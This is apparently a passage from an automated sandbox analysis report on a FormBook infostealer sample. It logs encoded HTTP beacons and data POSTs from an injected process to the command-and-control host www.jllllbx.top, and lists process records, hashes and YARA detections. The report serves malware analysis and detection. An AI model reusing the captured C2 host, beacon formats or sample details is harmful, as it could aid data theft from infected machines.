                                                        Data Ascii: JSCdAQ/luHjF4Ge24VDdl0TXe//nWyDdjx0PyScCpWud01qE2cPtv/UKUENjQOGA68S3RMOzXrq1tfV5VzqcqLBLDx2imU7L5WVPeAVYQGPAcy7LG1dgzitcQr2404c6lERXCYnlx0+7eoMV4AxNCA85jmbGlDDNzsbs1Svd4yVV0b+xSV5xxvWarADPKqgGHLAmtCszmsZC3kDO6pWzDNf3JKVcnvFLbwCNijqKAVPNUxzjjKa
                                                        Nov 7, 2024 15:52:12.411195993 CET1236INData Raw: 61 4b 6b 62 37 4f 71 61 7a 65 7a 77 2b 43 6b 6f 49 73 4e 6b 46 5a 35 42 75 37 69 4f 43 4e 6a 5a 34 74 51 46 68 55 6d 51 63 47 69 57 33 4c 58 51 4d 6a 69 59 57 70 63 61 6b 55 6d 43 6a 55 55 57 73 65 59 7a 6d 37 41 55 72 36 50 31 4d 53 4b 67 64 68
                                                        Data Ascii: aKkb7Oqazezw+CkoIsNkFZ5Bu7iOCNjZ4tQFhUmQcGiW3LXQMjiYWpcakUmCjUUWseYzm7AUr6P1MSKgdhYpRlYMsncwbvVxJQijuTIaYApAujW84niGp60qtCLjGMfVdLsj0QD7QCZCEG9qymDfAW2Aq/DtdPeg0AA1KICbmho8TS0ZZImSLhVnwCywzBOg8iV5+yA3PitgKl2UoAFe8ggobGqKjOS47EZWNBBwlg4GDTAATLs
                                                        Nov 7, 2024 15:52:12.411969900 CET1236INData Raw: 57 5a 30 6e 4c 6f 68 64 78 48 68 4c 79 63 77 47 36 66 49 43 31 54 6e 4e 78 66 44 77 34 62 66 33 2f 69 6d 35 32 4b 77 73 62 55 35 4f 74 2b 57 78 38 30 57 47 6f 2f 6e 38 5a 45 36 41 2f 6e 50 59 66 34 65 47 33 33 55 6c 68 4c 35 32 68 62 53 79 69 54
                                                        Data Ascii: WZ0nLohdxHhLycwG6fIC1TnNxfDw4bf3/im52KwsbU5Ot+Wx80WGo/n8ZE6A/nPYf4eG33UlhL52hbSyiTfGRUK6f/+rBOPXx+j27tUXW9U2EC8ttDx2jY3hXKzenz2gjr8rxmA8C9qXUBFtlBBt2vrKkqL9ArXqBrmq5q+vx7C3bXjFGnVWcRYvwPyEOuSNSPgjbAFN2Bz5SRMGtPtjaREddeEuNJ2gbcphPPPXXbEDqgoIyhr
                                                        Nov 7, 2024 15:52:12.412015915 CET1133INData Raw: 47 4b 53 77 66 4a 4f 4d 6a 35 6e 4d 6f 55 51 79 6f 30 61 33 77 56 4c 76 76 71 51 59 4a 66 47 4c 4a 63 2b 59 47 6b 57 35 58 6f 4b 68 33 66 48 36 57 6f 31 46 2f 6e 4c 72 4b 4e 72 59 6b 78 49 62 72 32 73 58 77 4c 56 50 78 36 56 71 39 66 52 2b 5a 33
                                                        Data Ascii: GKSwfJOMj5nMoUQyo0a3wVLvvqQYJfGLJc+YGkW5XoKh3fH6Wo1F/nLrKNrYkxIbr2sXwLVPx6Vq9fR+Z31N7STJVh/CJ0ZR4hsZQs+JolC+JJgNtfj8CsBI3Owo8zpR+wR468LqSc6T6IhuB+75QZRBD+eid24ze23PkZM47AH8SUy2bhMJiHWSev1Fi6IUK+jZ0iM5mNzbPsw91/s8dclh5hyc3NN+pgRp/QTM47xo5Jd+pNI


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.1050002156.234.28.94806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:18.563327074 CET767OUTPOST /14ny/ HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.jllllbx.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.jllllbx.top/14ny/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 65 36 66 34 73 50 36 7a 41 74 62 4a 78 75 36 4a 58 78 2b 58 4a 67 66 6e 76 50 4c 5a 76 6a 58 39 62 59 78 70 56 4e 68 73 39 65 30 32 33 2b 56 75 69 64 48 5a 31 4d 78 54 5a 66 72 6d 54 61 39 76 74 4c 58 57 75 79 52 65 31 50 7a 70 7a 47 70 63 63 36 50 31 79 62 79 64 39 4c 41 79 33 58 48 48 75 79 47 4a 38 73 64 33 2f 36 4d 4a 61 74 4d 6b 59 68 56 4e 37 71 6f 4d 78 6d 48 44 68 54 4e 34 75 58 35 75 36 4d 2b 67 4c 2f 50 53 42 75 57 54 39 46 5a 39 6f 6b 56 58 56 61 6c 36 6d 51 39 42 50 35 54 41 37 54 6f 4b 4c 56 55 2f 55 39 74 38 6c 74 30 45 6b 6c 4d 33 58 53 62
                                                        Data Ascii: eL-x=ce6f4sP6zAtbJxu6JXx+XJgfnvPLZvjX9bYxpVNhs9e023+VuidHZ1MxTZfrmTa9vtLXWuyRe1PzpzGpcc6P1ybyd9LAy3XHHuyGJ8sd3/6MJatMkYhVN7qoMxmHDhTN4uX5u6M+gL/PSBuWT9FZ9okVXVal6mQ9BP5TA7ToKLVU/U9t8lt0EklM3XSb
                                                        Nov 7, 2024 15:52:19.725002050 CET1135INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.1050003156.234.28.94806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:21.114036083 CET791OUTPOST /14ny/ HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.jllllbx.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.jllllbx.top/14ny/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 65 36 66 34 73 50 36 7a 41 74 62 4b 53 32 36 4f 41 6c 2b 66 4a 67 51 72 50 50 4c 41 2f 6a 54 39 62 55 78 70 52 38 6b 74 50 36 30 32 54 75 56 2f 51 31 48 61 31 4d 78 59 35 66 71 69 54 61 49 76 74 47 69 57 75 2b 52 65 31 62 7a 70 78 4f 70 64 72 75 49 31 69 62 38 55 64 4c 43 32 33 58 48 48 75 79 47 4a 2f 51 33 33 2f 79 4d 4b 70 46 4d 6c 35 68 4b 46 62 71 70 4c 78 6d 48 49 42 54 42 34 75 58 68 75 34 6f 41 67 4a 48 50 53 45 71 57 57 35 5a 61 6d 34 6b 54 59 31 62 78 2f 45 78 77 42 39 35 73 43 6f 50 43 64 34 74 55 34 31 41 71 74 30 4d 6a 58 54 35 43 35 52 6e 78 6c 4f 6c 71 77 53 52 53 62 65 4b 35 36 59 56 62 58 42 73 77 53 67 3d 3d
                                                        Data Ascii: eL-x=ce6f4sP6zAtbKS26OAl+fJgQrPPLA/jT9bUxpR8ktP602TuV/Q1Ha1MxY5fqiTaIvtGiWu+Re1bzpxOpdruI1ib8UdLC23XHHuyGJ/Q33/yMKpFMl5hKFbqpLxmHIBTB4uXhu4oAgJHPSEqWW5Zam4kTY1bx/ExwB95sCoPCd4tU41Aqt0MjXT5C5RnxlOlqwSRSbeK56YVbXBswSg==
                                                        Nov 7, 2024 15:52:22.067702055 CET1135INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.1050004156.234.28.94806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:23.659780979 CET1804OUTPOST /14ny/ HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.jllllbx.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.jllllbx.top/14ny/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 65 36 66 34 73 50 36 7a 41 74 62 4b 53 32 36 4f 41 6c 2b 66 4a 67 51 72 50 50 4c 41 2f 6a 54 39 62 55 78 70 52 38 6b 74 50 79 30 32 42 6d 56 74 42 31 48 62 31 4d 78 47 4a 66 76 69 54 61 56 76 74 65 35 57 75 44 6b 65 32 6a 7a 70 55 43 70 61 66 43 49 37 69 62 38 5a 39 4c 42 79 33 58 53 48 76 43 43 4a 38 34 33 33 2f 79 4d 4b 73 42 4d 69 6f 68 4b 48 62 71 6f 4d 78 6d 78 44 68 54 74 34 75 50 78 75 34 39 37 67 34 6e 50 56 6b 36 57 52 63 46 61 71 34 6b 52 62 31 62 35 2f 45 38 77 42 39 31 4b 43 72 54 6f 64 37 4e 55 37 7a 56 53 34 55 51 47 55 68 5a 61 31 77 54 62 69 37 56 5a 30 6a 55 76 58 74 57 6c 6b 5a 45 4b 57 78 31 6e 4e 2b 64 34 39 72 4a 62 66 7a 63 6a 2f 45 30 56 47 7a 4f 71 42 49 67 32 51 59 57 74 55 4a 71 33 6a 37 30 64 57 2b 2f 38 6b 2b 73 48 42 45 38 53 54 34 65 7a 45 7a 46 66 37 4f 66 79 32 58 63 34 42 5a 49 37 56 7a 34 66 6c 58 2b 6a 44 49 39 6b 36 70 41 63 35 58 65 48 52 49 2b 6d 45 2f 73 65 33 78 53 5a 39 50 4d 6a 37 52 30 72 79 76 66 52 76 6b 57 39 50 77 67 49 6b 55 66 71 46 [TRUNCATED]
                                                        Data Ascii: eL-x=ce6f4sP6zAtbKS26OAl+fJgQrPPLA/jT9bUxpR8ktPy02BmVtB1Hb1MxGJfviTaVvte5WuDke2jzpUCpafCI7ib8Z9LBy3XSHvCCJ8433/yMKsBMiohKHbqoMxmxDhTt4uPxu497g4nPVk6WRcFaq4kRb1b5/E8wB91KCrTod7NU7zVS4UQGUhZa1wTbi7VZ0jUvXtWlkZEKWx1nN+d49rJbfzcj/E0VGzOqBIg2QYWtUJq3j70dW+/8k+sHBE8ST4ezEzFf7Ofy2Xc4BZI7Vz4flX+jDI9k6pAc5XeHRI+mE/se3xSZ9PMj7R0ryvfRvkW9PwgIkUfqFfErzlNtPSrAuPffixOPFBfWKF7wX+vcZSw/WoXHHKgfRMw8wKqKXAl4bkrbRSU/dEvtIfl2cCUk5MLifzy4G47eM6tyChcSI6+Hvty1R6pHA7Q3KJUmYjr5LywCuzqgcVKYj6DC8holnF3q6MVmUTATw2t3Ny91XBp2/gOFYeUXw97fhHcf562QJxqHBrL+sMjK0hziZzeqYWqe8YEsWMyy8lDRIsgq4x/5gxNPq8r63ji9UGH3b5SR40HgKjHEhhdHgroMRJF8M1P3vePEp9WntEKJhjKaocgrj1cSTWJsZIjOiKFHjs7Xu4+vUuT0KM0F3bc3nUVgpwodaRlQouu565p9fZI9h0ojV6OrsERzvVQjQrZLoGgJxf4KbDeSRgCusStnheel7FmtGLBPlL/p2z9XyisuGF9ZykupnW/WRueNzgNAWW4IsZrXxKZm4RTNtEmmCormSQL0IlZHImMWWz9pfKeB6Tvr1GeiBidF14PZ9mizKzFqxy9z9ue11YKvlbUttGiSborGWsGlIbaqVstZXDt89XndL1pvZL71tkWwAoQNOmAhoYgKp7TOvkzkMot26gvr8PatNboNhSrb6nU6Bz/PoFq65kwuGHUgnw53mUp86qjM9JND4tvoYUYz/e4DQw0LwQQyRDYGzOKwF+xXsbobO8z [TRUNCATED]
                                                        Nov 7, 2024 15:52:24.672694921 CET1135INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.1050005156.234.28.94806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:26.199745893 CET515OUTGET /14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:52:27.156936884 CET1236INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Data Raw: 37 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 34 35 3b 26 23 36 35 3b 26 23 38 30 3b 26 23 38 30 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 [TRUNCATED]
                                                        Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;</title><meta name="keywords" content="&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;"/><meta name="description" content="&#9917;&#65039;&#9917;&#65039;&#9917;&#65039;&#84;&#67;&#71;&#24425;&#31080;&#65;&#80;&#80;&#55356;&#57144;&#121;&#107;&#49;&#56;&#56;&#46;&#99;&#99;&#9989;&#39030;&#32423;&#19979;&#27880;&#24179;&#21488;&#44;&#25552;&#20379;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#44;&#84;&#67;&#71;&#24425;&#31080;&#26368;&#26032;&#23448;&#32593;&#44;&#84;&#67;&#71;&#24425;&#31080;&#97;&#112;&#112;&#19979;&#36733;&#44;&#21508;&#31181;&#23089;&#20048;&#21697;&#31181;&#24212;&#26377;&#23613;&#26377;&#44;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#23448;&#26041;&#23458;&# [TRUNCATED]
                                                        Nov 7, 2024 15:52:27.157059908 CET778INData Raw: 32 34 34 37 3b 26 23 32 30 30 32 36 3b 26 23 32 34 37 34 34 3b 26 23 32 36 33 38 31 3b 26 23 32 31 31 35 33 3b 26 23 33 33 3b 22 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f
                                                        Data Ascii: 2447;&#20026;&#24744;&#26381;&#21153;&#33;"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><script type="text/jav


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:2
                                                        Start time:09:49:22
                                                        Start date:07/11/2024
                                                        Path:C:\Users\user\Desktop\RO2Y11yOJ7.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                                                        Imagebase:0x340000
                                                        File size:1'324'032 bytes
                                                        MD5 hash:5FFE1BA845FB6E48AAE4367EF675444E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:09:49:23
                                                        Start date:07/11/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                                                        Imagebase:0x5f0000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:09:49:53
                                                        Start date:07/11/2024
                                                        Path:C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe"
                                                        Imagebase:0x940000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:7
                                                        Start time:09:49:55
                                                        Start date:07/11/2024
                                                        Path:C:\Windows\SysWOW64\Atuserer.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\Atuserer.exe"
                                                        Imagebase:0xf20000
                                                        File size:68'608 bytes
                                                        MD5 hash:D5B61959A509BDA85300781F5A829610
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:09:50:08
                                                        Start date:07/11/2024
